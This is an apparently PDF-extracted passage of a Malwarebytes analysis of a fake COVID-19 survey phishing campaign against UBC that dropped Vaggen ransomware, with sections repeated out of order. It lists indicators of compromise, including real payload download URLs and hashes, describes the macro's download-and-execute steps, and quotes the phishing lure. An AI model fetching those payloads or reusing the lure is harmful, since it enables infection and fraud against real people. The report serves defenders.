3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2796 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2797 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2798 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2799 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2800 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2801 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2802 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2803 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2804 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2805 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2806 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2807 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2808 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2809 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2810 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2811 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2812 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2813 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2814 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2815 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2816 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2817 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2818 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2819 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2820 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2821 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2822 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2823 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2824 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2825 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2826 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2827 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing 